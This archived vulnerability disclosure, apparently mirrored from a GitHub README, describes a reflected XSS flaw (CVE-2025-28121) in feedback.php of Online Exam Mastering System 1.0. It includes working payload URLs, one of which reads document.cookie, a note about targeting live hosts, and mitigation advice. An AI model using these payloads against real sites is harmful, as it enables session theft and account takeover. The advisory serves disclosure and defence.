POC详情: ddc9222bf72da52c5d00d6e382ddeaf8457b58e3

来源
关联漏洞
标题: Code-Projects Online Exam Mastering System 安全漏洞 (CVE-2025-28121)
描述:Code-Projects Online Exam Mastering System是Code-Projects开源的一个在线考试系统。 Code-Projects Online Exam Mastering System 1.0版本存在安全漏洞,该漏洞源于feedback.php中q参数存在跨站脚本,可能导致执行任意代码。
介绍
# 💥 CVE-2025-28121 - Reflected XSS in Online Exam Mastering System 1.0

## 📝 Description

**code-projects Online Exam Mastering System 1.0** is vulnerable to **Reflected Cross-Site Scripting (XSS)** in the `feedback.php` file via the `q` parameter.

This issue allows remote attackers to inject malicious JavaScript into the application, which gets reflected in the response without proper sanitization or encoding. Successful exploitation can lead to cookie theft, account takeover, or other client-side attacks.

---

## 🕵️‍♂️ Vulnerability Details

| Field | Info |
|-------|------|
| **CVE ID** | CVE-2025-28121 |
| **Vulnerability Type** | Cross-Site Scripting (XSS) |
| **Affected Component** | `feedback.php` |
| **Attack Type** | Remote |
| **Impact** | Account Takeover, Privilege Escalation |
| **Product** | Online Exam Mastering System |
| **Version** | 1.0 |
| **Vendor** | code-projects |
| **Discoverer** | Pruthu Raut |

---

## 🔥 Proof of Concept (PoC)

### Vulnerable Endpoint

```
http://localhost/exam/feedback.php?q=Thank%20you%20for%20your%20valuable%20feedback
```

### Exploit Payload

```http
http://localhost/exam/feedback.php?q=<script>alert('XSS')</script>
http://localhost/exam/feedback.php?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E
```

> 💡 **Note:** Replace `localhost` with the deployed target IP or domain if testing on a live environment.

### How it Works

When the above URL is opened by a victim, the malicious script embedded in the `q` parameter gets executed in the context of the victim’s browser. Since the input is directly reflected without sanitization, it opens the door for classic reflected XSS attacks.

---

## ⚠️ Impact

- **Account Takeover** via session cookie theft.
- **Privilege Escalation** if an admin user clicks the link.
- **Browser Exploitation**, phishing, or other social engineering attacks.

---

## 🛡️ Mitigation

To prevent this vulnerability:
- Sanitize and encode user input before rendering.
- Use security libraries such as OWASP’s [ESAPI](https://owasp.org/www-project-enterprise-security-api/) or built-in PHP functions like `htmlspecialchars()`.
- Implement a Content Security Policy (CSP) to reduce the impact of injected scripts.

---

## 📣 Disclosure

This vulnerability was discovered and responsibly disclosed by **Pruthu Raut**.

---
## Video POC



https://github.com/user-attachments/assets/6af000c3-08ad-46a6-bc93-efc48218591d

文件快照

[4.0K] /data/pocs/ddc9222bf72da52c5d00d6e382ddeaf8457b58e3 └── [2.4K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。